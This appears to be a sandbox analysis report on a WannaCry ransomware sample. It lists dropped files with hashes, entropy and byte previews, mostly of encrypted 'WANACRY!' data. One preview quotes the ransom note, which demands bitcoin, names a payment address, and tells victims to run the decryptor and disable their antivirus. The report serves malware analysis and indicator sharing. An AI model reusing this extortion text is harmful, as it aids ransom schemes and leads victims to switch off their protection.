                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.822553456193062
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:d85k/BAFa2b9bQv5rzgVcCQXQEcoa6pCPp0pTTVETiv6bt:d8TFfFmNgV3QXQEcR6op0Drv4
                                                                                      MD5:0F6A37D159AE9E57EA74B7016A533897
                                                                                      SHA1:ED3CDBA8CD74268F81CF8BD611ADE17843623EC6
                                                                                      SHA-256:D93E5386DEBCD84DDEA500E244EF1EB9A11DC5811E888653106A3475D62E2634
                                                                                      SHA-512:CBA866B9864EB24DC1C3CBF7D5C58ED63559752C543FDB9E8FF84719924B34F55C6BBB9513D90DE0522D534D84DC2432C8BE9C33F4F6D1D3123AFF1539674242
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.......A........+.n..'.fP........."..E...h...._AK6...)...R..;.......=..[M..56K....d......67.X."K....G;sw.a...%r...!.q..i.1...%.....N.......eE+.(.w.........8,.....M...t.1.uU..{.*..z.H`P...._.P~..H.<S.....(5.K....q2..9.|.Z..0.wO}r@.c.{..-.R..+S...f~(..H.F..d..sK.xi<.y.......?........%J=X.7...<..[F.D.Y@V.ar.@.lI...E4.c.r."....OL.ld....J.)U..z.8.9...q...d..S......=.`..A...0.X!.. f.V....#.$...XH.;~e#....%.....g.#....9....v....T<..o?T.Y"24Vw.....b.1....T.....*0......,.WW...D..N].....6.b....L.,....f.]S....\.m.z.....t.....04H..~.....k..N+..;.spf.!......1l*.........~..`q.....>.0f..b..[..j`..Ei.m.Fb.(b..Ea..v..^Qb...oP.{...."X2%.@.&^.......9j.w<..K...Tx..........D.T..3..y.dS..a..<.....A...n..b..+...1..]..oxY7..5..-j.....K-.H..........t.......uj4.SW....+Yn.wDcr8...j....-x.&....&.......J?.zW.\q..Hb.....7.k.=7......p.s.t.......~.p.....`.)b1(..j.@..o.|9e."..d....m8.....D.&_N.....4.d-=N.I.).@OZ.L...!.....]?9r..4^.R|.....y...Q.7.?...!.v.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84525119658223
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkaZHqtC8dQz9rnk0PFUW5UadgARSNLqzOw3ho3wYdHQcVE7ZwGEhk8gTdK:bkaYtCh9rnjFPEuN36ARcVsZwGEhk8gA
                                                                                      MD5:B7934A9D057DAF47FEDD207901454927
                                                                                      SHA1:9A12C5D46568661872BD748B616CB4B47B73DAD6
                                                                                      SHA-256:E79B7017C9297FFD5AEDB66795D6D2BECAFFC2E1E709C7B5116126D603A0A6B1
                                                                                      SHA-512:E78EF839379E0FC9CA93158D3905CF10ECFFEEE770A1456E1D4151D01E28A9950A16C92FCC60BDC45CD3A91BB495F11CCEB91A5445D590F25F792DC9B25CAFBD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......?.+r.+T..6j..q........b..nS.2..k.'.+.0@CQ.....7.....N..p.Q{M.......bn4.(Bk_U4_[....$z....[.........x.Q....`n....?./...g.(.X1#.E..V...}t...7@...ra.].34..}.^OXO.?P..,....Yg..n...,2.9<S....i. .m...w...@.@.:4.!......O).2.J........<L...5...y.Z.....................I.}V."..823YZQ1.Q.8t..$ZO.._;.g.:...4..._...e{..8.0..-}0..*j!N...`*....Q...F....N7..e.{.....Fw%...k$._..}........M41]V.7.vN.2.3D-g..3...(........|...Qz..(OR,........F........F.v..k......^..R.@..rOR.$.E...M.O.....4.g:.....KC..HE_...3<.M.......a;.U.Z7W9.#o{ ...iVh.... m.y.YF`........}....>...O..i.IA..............p.l@....&...x.y.S...De..W.....Q..O9...^...Jc..-F...p.a7J_..H...'.*..VV:&...T.......Z@..T..z..,...'...........J.@i..]...~..^D^7...Z.'P ...G.....h7..v..#.-f.n..&.............\...Vj.O..+.........@.UFZ.&s...+..].A[.q.......Q.h.=..+V.........B.H..".....C2)M...|f..UK.L<!.#PC<s....@...'..)T..m#...w.y$.....a.i<ZT......$oS..P7........m$#.....k.....qY....A..N..&..@.w.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84525119658223
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkaZHqtC8dQz9rnk0PFUW5UadgARSNLqzOw3ho3wYdHQcVE7ZwGEhk8gTdK:bkaYtCh9rnjFPEuN36ARcVsZwGEhk8gA
                                                                                      MD5:B7934A9D057DAF47FEDD207901454927
                                                                                      SHA1:9A12C5D46568661872BD748B616CB4B47B73DAD6
                                                                                      SHA-256:E79B7017C9297FFD5AEDB66795D6D2BECAFFC2E1E709C7B5116126D603A0A6B1
                                                                                      SHA-512:E78EF839379E0FC9CA93158D3905CF10ECFFEEE770A1456E1D4151D01E28A9950A16C92FCC60BDC45CD3A91BB495F11CCEB91A5445D590F25F792DC9B25CAFBD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......?.+r.+T..6j..q........b..nS.2..k.'.+.0@CQ.....7.....N..p.Q{M.......bn4.(Bk_U4_[....$z....[.........x.Q....`n....?./...g.(.X1#.E..V...}t...7@...ra.].34..}.^OXO.?P..,....Yg..n...,2.9<S....i. .m...w...@.@.:4.!......O).2.J........<L...5...y.Z.....................I.}V."..823YZQ1.Q.8t..$ZO.._;.g.:...4..._...e{..8.0..-}0..*j!N...`*....Q...F....N7..e.{.....Fw%...k$._..}........M41]V.7.vN.2.3D-g..3...(........|...Qz..(OR,........F........F.v..k......^..R.@..rOR.$.E...M.O.....4.g:.....KC..HE_...3<.M.......a;.U.Z7W9.#o{ ...iVh.... m.y.YF`........}....>...O..i.IA..............p.l@....&...x.y.S...De..W.....Q..O9...^...Jc..-F...p.a7J_..H...'.*..VV:&...T.......Z@..T..z..,...'...........J.@i..]...~..^D^7...Z.'P ...G.....h7..v..#.-f.n..&.............\...Vj.O..+.........@.UFZ.&s...+..].A[.q.......Q.h.=..+V.........B.H..".....C2)M...|f..UK.L<!.#PC<s....@...'..)T..m#...w.y$.....a.i<ZT......$oS..P7........m$#.....k.....qY....A..N..&..@.w.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8018764279540385
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:L9Vk8c7S4LqA+4mOvHjQj3+bBoH1F9M1awijsQcISzIb0Q7qE:L9Vk81wq8vMj3g2/Ml6sQc3z1Q2E
                                                                                      MD5:10E6F77360277A7AEE975FBB73D0A52E
                                                                                      SHA1:2C4EC530766380675E7999EB94473EAA996267B0
                                                                                      SHA-256:C52382001157ACB847CA0FFA82D3682AC2AB9A7B5A0AFEC83FFA159F1A422D18
                                                                                      SHA-512:EBA7DE0CF9DF18188751D47C61F76D3E467AB2C5DC0F3B05CA0311AE3D398CFBF2AD9D8DE2BF52FA95279B70BE5D02294780BF9099A887CDFB775C0A004EAD84
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.....=.....Q.l#p0...... ?.....u.~5.X.#...V.&9..U...N.a..Q.E...C...8...I.. ...............K!..AV..."_.p.....K....(.s....|EW....+E..Z-V_c..18"....L...y.va...*.6....;...^..}..7h.\..z......q. .......{F.c.?U...8R.c`.K....S..........R{4n........9Z..0.0Y.=.......(..J4.B..ao..F.9N.......^.. .b}&....H7..$.5,gK*..!T9S....D.....Z?...kN.7.f..y..k.X..x.T..p..l..._[..x.IO.uG<E(...L...z.'.....4e.7./..Ux>..qk]...(7W..Q...J.2.a..]].e.4*....K..Gm ..-..MA2..+.G.q]..{.@..$C.5...Q......<>......9y."w.n!..m..}l...i.s..6*u...]0/S.[.@ `....U8..MB.b....d.(.4...N.....7/..v..^N...H0.......$.....`..sq&....l....4J..L.........7Wv.....9..Gy[=.NOH..Gx%;k.............z...cc.bh-.....x.mX.D..+<J.A.G%......\........m.T.AF.y.f.....c.y>.@".+>.. ....el(|....<k.@....t....#..k..+.:P.....>..|.T.q0.....0..D{_G<......0y..j..0._.~...W./.N.D.X....v..*.....K....A..C._6Y....p..JIG.....rP.M....o......TD..N=.....5.q..r..+...C...z..<..K.....m..M.We..._o...?%....dw.g..4.l..iU.|9..e.HM.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.855601813140918
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqpFzER8c6bmhgf/IMbdg34moTcyvTE85B/SkDkJxmmH+a4+NEz1:bk+FzEWvbYgf/IUwooyvVB/SEkJzHJTU
                                                                                      MD5:FE6BFE277945D926E7A37472C6200E4C
                                                                                      SHA1:6CD1EFB7C4A74D64ABB8AB26BCC45F37A4A1723E
                                                                                      SHA-256:D9FC2636DF585AF13E62FDD0CCC7B2ECE4240CE4B9E5B38BB34CB0A5FD4572ED
                                                                                      SHA-512:C1A2DE5876CB587B0234C7B7CB6BA88A1FFB7B00CEB31D5F439F3F8A848EF3230AF2027BABBCF9CE67E49C15CF1375D88A4328FAF50FC83EB2F9D3E17DB694AD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......#.....n.~B....i:.>.ba..u.d:b.+.......31.9Pq.....F........&.]...$..&...........VR:.0.x)A.+6n#..lR.Z.9.8..k).*... v...l......0'.....Q..&.]&.1.....|<..].....,...o&..S.2[.H..../4.\..5co..d.&.3.(.n8.w...D....|..je...ccJ.b]...$.....nN..TR>I..V.TD...................5.pG..{5`.$..M?.f^`....*T...X.K...v....Au\..:.2I*._?h-..&......{.S......f...O.1=..=Y..G....w2..b..d.g..K...?G.W.w..m`4..v.1..}.LCc.........W<.........V..F..x?.K&<...h$.2.H...9t....Q.......F..9P.]......4.....n.2.J.VZ.KT...Z..|.4q...~..*\.. ..I@..A9}.0.:.A."jU...NZ..T..]g_7..N..s.l.h]D.....3....&a.T...Kg.F.b^.....[..9o..........{.m.r= .R..E..H...j..@..{.b....<z....:..X..?.\~.}Fv....JZO............t/.0...).-.xv......7>.. ..(.h.....g....Jld..IHzrq.T.....6....t..V......f..q..1..-.2...o.......b..x.l.XS.x.t..S,3$.....c...(.J...&... =.....LX...~.kn<..Lq...x3t.........$.. .=.......4~...B.....W........|...c5"...M..e.[#.,.C.......E=.&...Lx....C...A..Q.........I.....g.....j.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.855601813140918
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqpFzER8c6bmhgf/IMbdg34moTcyvTE85B/SkDkJxmmH+a4+NEz1:bk+FzEWvbYgf/IUwooyvVB/SEkJzHJTU
                                                                                      MD5:FE6BFE277945D926E7A37472C6200E4C
                                                                                      SHA1:6CD1EFB7C4A74D64ABB8AB26BCC45F37A4A1723E
                                                                                      SHA-256:D9FC2636DF585AF13E62FDD0CCC7B2ECE4240CE4B9E5B38BB34CB0A5FD4572ED
                                                                                      SHA-512:C1A2DE5876CB587B0234C7B7CB6BA88A1FFB7B00CEB31D5F439F3F8A848EF3230AF2027BABBCF9CE67E49C15CF1375D88A4328FAF50FC83EB2F9D3E17DB694AD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......#.....n.~B....i:.>.ba..u.d:b.+.......31.9Pq.....F........&.]...$..&...........VR:.0.x)A.+6n#..lR.Z.9.8..k).*... v...l......0'.....Q..&.]&.1.....|<..].....,...o&..S.2[.H..../4.\..5co..d.&.3.(.n8.w...D....|..je...ccJ.b]...$.....nN..TR>I..V.TD...................5.pG..{5`.$..M?.f^`....*T...X.K...v....Au\..:.2I*._?h-..&......{.S......f...O.1=..=Y..G....w2..b..d.g..K...?G.W.w..m`4..v.1..}.LCc.........W<.........V..F..x?.K&<...h$.2.H...9t....Q.......F..9P.]......4.....n.2.J.VZ.KT...Z..|.4q...~..*\.. ..I@..A9}.0.:.A."jU...NZ..T..]g_7..N..s.l.h]D.....3....&a.T...Kg.F.b^.....[..9o..........{.m.r= .R..E..H...j..@..{.b....<z....:..X..?.\~.}Fv....JZO............t/.0...).-.xv......7>.. ..(.h.....g....Jld..IHzrq.T.....6....t..V......f..q..1..-.2...o.......b..x.l.XS.x.t..S,3$.....c...(.J...&... =.....LX...~.kn<..Lq...x3t.........$.. .=.......4~...B.....W........|...c5"...M..e.[#.,.C.......E=.&...Lx....C...A..Q.........I.....g.....j.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.821769213296615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:70q/zOWrmcN9vOlL65J+eWTEdw7lhoPrC:hnCcN8mJ+fTEd0oTC
                                                                                      MD5:6C04D406728E4F4712092BC01DF94DE1
                                                                                      SHA1:D0EE3E574FE3514C04520A751D618F4C41D1D8A7
                                                                                      SHA-256:F7F10B83FFD0CF6DD97BCD3ED42B499826E9C016E46B94850B1758DAB72122D6
                                                                                      SHA-512:526489C22A49AF9967131B0C4556E9B589A3E4CF50A887FAA3BA3D0FD188D7C32EFEBB29BCDAD54AB093B92EEBB149A578F59B81929C978DC5B388F660FB21B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:k..T.Z..O...2Uk..2v..5..wJ..R....Z..iV8....{^p.0_..0l@:E........k;...vv.r..........V....^h...........E^....(..S.O.oR....r86..m...3d^. ..f..U.......3...7.>..'.....p....@..E....Tw.8.4.9M.S.m5...lJ|.8[......6....8j..O....)... -\....y..p2....K....D.K.{.....)[D.N..... .....T..B.s.d.ZD.."N4.D....,..p[.E9H....8...s..*..?..i.V....-p.......Hq7..{\.......B.D.7..o4t=.j.)Y..uV.<.u2..6+9...6.$.q/.f.@V..O..cPAc....c........lSS...Q...X4i..G..['..a..5....L(..w..{.-...)..Z..........3..U.k.G&W.ads:..*........X. .../(3.&.E.H..V.!.......'.z.EP..0.......X.....ZT.Gz.@HKQ<..k.V../..hr.*.........F..M....*M5.^..X..2H!=...Z...Cu<2.nB.Yr....f..o..-Z.5T.L..h.....K.......I...}v..v>6...01>eG5c.O......F....;..aJ.r..).#U.....O.....d..rnI..-.l....(....X......'...9.."K..|.z?..6...7.Y.o".....uW.9k.(..8.1..vF.;;e..H..Q9.W.D{.._:.......7.DYT...8......w.]..\..v.%..........g?...%.(......{..)U.]..[.....3h...a@.}..-..E......{.yA....".m.....p.`l.tq{.$n..N..}....:.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.848391227702372
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkonpMuHRFIGo5jPiQDgTlVPmqiNTmLiWh7wjU2lA/8c9yyo63ogqNuWdCIRdE+G:bkopVDOdiggRFiNTmL8fq9yyo63oQUTS
                                                                                      MD5:21C463EB0FCC7BB9203B329FCA684BD5
                                                                                      SHA1:FB65C420DC2BF648F985DC326409ED2B5444B255
                                                                                      SHA-256:5894079097F72BCCFD23636161022FA3FA6617527CCDB40BF313241E77938254
                                                                                      SHA-512:B6CC3ED38C530555C922C017E2D321D89B2A697F31CCDAA54BEC653529DE277E3B5EF0686D5240BB7CCA41B5E707E88887460639B930C6FAD415419FECBE99AC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!............w....M].$.. Z.G...+./p...1.....ij.6.:.M.[...06.e...n..........H...{Xd-B.`.....|....7....ex1..|...X..'.NJ.*-6....R.<E.....I-R.}...AL.@[.F.wi..Rq.|..I.I/;R=...Xg/.O...9;2.rW%|-D..4.0...2~.,....k[.."65.....q..-.X.5..`M....wc.d..........n..2............5$.WB<WUj.n.l..:.R.t.Q....A...$.......).ETP.W.D..$.....6.....[..Kt.m..j*......v...S.........._.b.sE-....R..r%.P...e._c.......j....Q.G.S....(.......uV8......P.C...6..S#Y..!...lF...e.@.i...t.4$.......uG.....,..A.TgY...H...Pj...m.l}........\..............>!...4.:...M.#-.X0.dt....0.o(Chk......|y.....Ka....8......_g....fEa.h?.....U.h...k..5..{.~kc...Eo.NK6.#.If=...0. w.....h.. .....:.0*.j.-.j.+..B.?.&.W..J..2...>.Zq..o.k..P\7/-}..4L.f.k..|..@.z,.....b.`-..{.8.y..@...b.......j.m.t\o..?}.....<..../6..'.,.......m.5....Fz......<.....z...1%C...\(..&.%Sz..(....(..*.E.%...jcR....V.X..(g...u.h.bE.a..,7.*...s..W..DL....v...M.A......!...D.....G(.p......a.>.dA...c.6...9WF2.Ub+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.848391227702372
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkonpMuHRFIGo5jPiQDgTlVPmqiNTmLiWh7wjU2lA/8c9yyo63ogqNuWdCIRdE+G:bkopVDOdiggRFiNTmL8fq9yyo63oQUTS
                                                                                      MD5:21C463EB0FCC7BB9203B329FCA684BD5
                                                                                      SHA1:FB65C420DC2BF648F985DC326409ED2B5444B255
                                                                                      SHA-256:5894079097F72BCCFD23636161022FA3FA6617527CCDB40BF313241E77938254
                                                                                      SHA-512:B6CC3ED38C530555C922C017E2D321D89B2A697F31CCDAA54BEC653529DE277E3B5EF0686D5240BB7CCA41B5E707E88887460639B930C6FAD415419FECBE99AC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!............w....M].$.. Z.G...+./p...1.....ij.6.:.M.[...06.e...n..........H...{Xd-B.`.....|....7....ex1..|...X..'.NJ.*-6....R.<E.....I-R.}...AL.@[.F.wi..Rq.|..I.I/;R=...Xg/.O...9;2.rW%|-D..4.0...2~.,....k[.."65.....q..-.X.5..`M....wc.d..........n..2............5$.WB<WUj.n.l..:.R.t.Q....A...$.......).ETP.W.D..$.....6.....[..Kt.m..j*......v...S.........._.b.sE-....R..r%.P...e._c.......j....Q.G.S....(.......uV8......P.C...6..S#Y..!...lF...e.@.i...t.4$.......uG.....,..A.TgY...H...Pj...m.l}........\..............>!...4.:...M.#-.X0.dt....0.o(Chk......|y.....Ka....8......_g....fEa.h?.....U.h...k..5..{.~kc...Eo.NK6.#.If=...0. w.....h.. .....:.0*.j.-.j.+..B.?.&.W..J..2...>.Zq..o.k..P\7/-}..4L.f.k..|..@.z,.....b.`-..{.8.y..@...b.......j.m.t\o..?}.....<..../6..'.,.......m.5....Fz......<.....z...1%C...\(..&.%Sz..(....(..*.E.%...jcR....V.X..(g...u.h.bE.a..,7.*...s..W..DL....v...M.A......!...D.....G(.p......a.>.dA...c.6...9WF2.Ub+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.797498118319819
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qrYvuqz9G4wF4SWrpYBaYqTp+qvdTHW8qEo4tB0ZKWYzV69XYN:3261rpYoQWZr5I9U
                                                                                      MD5:0642D86B9FEF146AD6D6768E864B7148
                                                                                      SHA1:AEF0521F599222630CA07EDB95AE79A0010BBC5F
                                                                                      SHA-256:ED68CE17053DFAF9F5D946A433FBC8ECA4A282A501D56545DF5F1B959F8B76B3
                                                                                      SHA-512:564B49589E3F133FC9880B00785C9B10A32B984647EE43881AEB732D51636A49C3C00A4389ABC7DCA78B486629A593F114184A8228E3B9813D29AD07B0BD9AD4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:`c.....Zyc...QA.G.2...t4.....L..7..P.i=S....p&&E"6*.:..?..../k.L=..&.Q...... r...v..G.+......jGY...c..1 ."...r.(.2.#.3.'./.'tF.Y.r.jY.7...Wnu..._..N...|..4W..(".{.._..n...$.K......0.)....y....W.......Uj.zp.|.@.ZO>.(.....vDN..%.c..B..!.......Z5c.C.......\lN...VS..).J...>Z.n.Z ..q4sE.b:.S.l...4...K....t...BOZ..)+....1..6.^.L...;..p.\R..X.....`+......u$.yR.....M..;R....;+.|6.l..J.x..*.);......$9.........rZJ.x.._7..n.09.0.xK.59.L....d{T..i........!t..M.V.y*.K......!b...Zf*-...U...W..w..T....-..C.-.1.#..S`...$..|...0..E........p..........W&?.e:.....y.........V.c..M.;...jV52V.]!5,+n...NG..... J.bC#.4z.....Q.&Co.....r......]YnX...I/.8....|.V..6.KM.6uy1. H...b.J.{.#~r..9...5..E.......Yz..N5)..X;...|OS_.=M.._.i.L.e..JJ...h.^.r.c....p..e...+.(Sr0.D..m-Z|.?t.J.-...}.. ..t...g....#zMS.m..R.&......[...v|..~..E.`C^>S..:...;.$...il6.|I4.\.P.@.>....W....M=.,7..f.=..c..JH..P.~b6!..w.x.......y.B....]3T.WZ.V..u....v.FE.........Qh..[..I.i..;'.-Z{....x.`.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.854273807246007
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKgCUWoEKxWrwDlPCoJVhtiWxSGACWUgBLRAqMUYDwxiX33cgGQbqgIps1lVcMl:bkeZkxCo5tiWxtWlRTmwu3cgG0IqAECM
                                                                                      MD5:F1FACE2BA7D8362CF247F8E63952F5F3
                                                                                      SHA1:780E9EBD426C8E68779A7A5D64212F445E17A7D8
                                                                                      SHA-256:FA8927A9610F224C63147A0FB018A10F2A172D4F5F4F327A01F833F6E2EE6B75
                                                                                      SHA-512:29E6711E740D9B46F7FA0C5E62E71A755FE94090B2E95D1184659D4DFDF8DA12421C229423E2EDF574F3387F7B2509E1F02BDBBCF8E3A16FD49027687C3E02D7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X....Ay1..]....8+. ..R.CY....6.*QlN.m.U=.iMt.8.7.*..L...o..}........9......7<.#...."q.46.'...a..".Hohf.Q.nS.QC.FX"pb8s"a...$.0...4.....x....lOV..ga.Z.*.L.'.]..19O%d..U..O...w.I.......L.K..x5..,.@O.V.S.....0..w..q}..K)..A........._......sObtG.0...............A..0.eF.....J..#....W.k..18.7..p...G.u..Y..M..)...^.kj.zM3R/.......i.I....:.c)....}.."<7%.......VF<...,|.oOe..v._E.).4.-.....A.... d1Ypeb.r."......<.:..9#..Y....(.........a..#....O..UF=H.J.}..l7. .:....\^.0P...x.c... R5.......3..XQ.2..oRp'.$E.HkQx..Z........7e....L.er;5....P7.KU...2.`..!.l.'..T.s...Y\p*4..c:@'ZS._\.*L.Qc.r{....BM!.9.1.:..`#n:.'. J%J....D[De...=..}p....E...*2t...?s..B.x.......X.h...Sd..X.B}\.x..... ..4@.2.......M.AeC....a.1.......r7o...|Z.X..c.........*....jB.V......'z...h.].|....dx.A.ua..3A(....=...g.a.....>8...0.m..3Z.(#(...bKm+...Z....D...?;....s.....],^x.P.......d...T....(...y..i.W......H....]....,...|~$.\..=_`12sg..;.2.}\..js......X.. ..........4..60c'/
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.854273807246007
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKgCUWoEKxWrwDlPCoJVhtiWxSGACWUgBLRAqMUYDwxiX33cgGQbqgIps1lVcMl:bkeZkxCo5tiWxtWlRTmwu3cgG0IqAECM
                                                                                      MD5:F1FACE2BA7D8362CF247F8E63952F5F3
                                                                                      SHA1:780E9EBD426C8E68779A7A5D64212F445E17A7D8
                                                                                      SHA-256:FA8927A9610F224C63147A0FB018A10F2A172D4F5F4F327A01F833F6E2EE6B75
                                                                                      SHA-512:29E6711E740D9B46F7FA0C5E62E71A755FE94090B2E95D1184659D4DFDF8DA12421C229423E2EDF574F3387F7B2509E1F02BDBBCF8E3A16FD49027687C3E02D7
                                                                                      Malicious:false
                                                                                      Reputation:low
